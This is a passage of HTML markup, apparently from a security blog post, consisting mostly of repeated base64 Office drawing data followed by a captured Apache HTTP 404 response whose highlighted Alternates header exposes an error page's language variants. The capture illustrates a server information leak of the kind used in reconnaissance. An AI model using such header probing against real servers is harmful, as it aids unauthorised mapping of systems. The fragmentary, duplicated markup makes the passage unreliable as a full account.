bHMvLnJlbHNQSwECLQAUAAYACAAAACEAWCzsB9oFAABcLwAAHwAAAAAAAAAAAAAAAAAgAgAAY2xp
cGJvYXJkL2RyYXdpbmdzL2RyYXdpbmcxLnhtbFBLAQItABQABgAIAAAAIQDhUTcfzwYAAOYbAAAa
AAAAAAAAAAAAAAAAADcIAABjbGlwYm9hcmQvdGhlbWUvdGhlbWUxLnhtbFBLAQItABQABgAIAAAA
IQCcZkZBuwAAACQBAAAqAAAAAAAAAAAAAAAAAD4PAABjbGlwYm9hcmQvZHJhd2luZ3MvX3JlbHMv
ZHJhd2luZzEueG1sLnJlbHNQSwUGAAAAAAUABQBnAQAAQRAAAAAA
" o:spid="_x0000_s1026" style="font-size: 11pt; height: 394.5pt; left: 0px; margin-left: 54pt; margin-top: 278.25pt; position: absolute; visibility: visible; width: 484.6pt; z-index: 251659264;" type="#_x0000_t202"><br /></v:shape><v:shape fillcolor="#d9d9d9" id="Text_x0020_Box_x0020_26" o:gfxdata="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
" o:spid="_x0000_s1026" style="font-size: 11pt; height: 394.5pt; left: 0px; margin-left: 54pt; margin-top: 278.25pt; position: absolute; visibility: visible; width: 484.6pt; z-index: 251659264;" type="#_x0000_t202"><br /></v:shape><v:shape fillcolor="#d9d9d9" id="Text_x0020_Box_x0020_26" o:gfxdata="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
" o:spid="_x0000_s1026" style="font-size: 11pt; height: 394.5pt; left: 0px; margin-left: 54pt; margin-top: 278.25pt; position: absolute; visibility: visible; width: 484.6pt; z-index: 251659264;" type="#_x0000_t202"></v:shape></span></span><br />
<table cellpadding="0" cellspacing="0" style="width: 100%px;"><tbody>
<tr><td><div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Response:</span></b></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">HTTP/1.1
404 Not Found<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Date:
Tue, 16 Sep 2014 13:33:18 GMT<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Server:
Apache/2.2.22 (Linux/SUSE)<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="background: yellow; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt; mso-highlight: yellow;">Alternates:
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-2} {language cs} {length 745}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language de} {length 766}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language en} {length 611}}, {"HTTP_NOT_FOUND.html.var"
1 {type text/html} {language es} {length 699}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language fr} {length 789}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language ga} {length 813}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language it} {length 692}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-2022-jp} {language ja} {length 749}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset euc-kr}
{language ko} {length 703}}, {"HTTP_NOT_FOUND.html.var" 1 {type
text/html} {charset iso-8859-1} {language nl} {length 688}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-2} {language pl} {length 707}}, {"HTTP_NOT_FOUND.html.var"
1 {type text/html} {charset iso-8859-1} {language pt-br} {length 753}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language pt} {length 272}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language ro} {length 689}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-5} {language sr} {length 716}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset
iso-8859-1} {language sv} {length 722}},
{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-9}
{language tr} {length 755}}</span><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Vary:
accept-language,accept-charset<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Content-Length:
409<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Connection:
close<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Content-Type:
text/html; charset=iso-8859-1<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">…[omitted]…<o:p></o:p></span></b></div>
</div>
</td></tr>
</tbody></table>
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><b><br /></b></span></span>
